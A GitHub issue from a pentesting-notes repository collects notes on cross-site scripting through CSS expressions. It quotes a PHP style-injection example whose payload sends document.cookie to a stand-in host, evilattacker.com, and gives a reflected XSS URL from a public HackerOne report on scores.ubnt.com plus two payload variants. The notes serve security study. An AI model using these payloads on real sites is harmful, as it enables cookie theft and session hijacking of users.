Create notes about XSS via CSS expressions

tcpiplab / Web-App-Hacking-Notes

Notes I've taken while working through various web app pentesting labs.

88 stars 19 forks source link

Create notes about XSS via CSS expressions #6

Open tcpiplab opened 7 years ago

tcpiplab commented 7 years ago

From @padraic's book which is at his phpsecurity repository:

On the server:

<div style="background:<?php echo $colour ?>;">

Injection payload:

$colour = "expression(document.write('<iframe src="     .= "http://evilattacker.com?cookie=' + document.cookie.escape() + "     .= "' height=0 width=0 />'))"; <div style="background:<?php echo $colour ?>;">

tcpiplab commented 7 years ago

Sitepoint has a good page documenting CSS expressions.

tcpiplab commented 7 years ago

I first heard of CSS expressions as an XSS payload from a publicly disclosed bug on hackerone.com:

Reflected cross-site scripting (XSS) vulnerability in scores.ubnt.com allows attackers to inject arbitrary web script via p parameter.

Attack:

https://scores.ubnt.com/form.html?uid=259&p=airFiber);xss:expression(alert(1));border-image:url(foobar

Two options for the payloadb:

);xss:expression(alert(1));border-image:url(foobar
);border-image: url(javascript:alert(1));content:url(foobar

tcpiplab commented 7 years ago

This attack targets older IE browsers. But it supposedly works with Chrome, which I will test.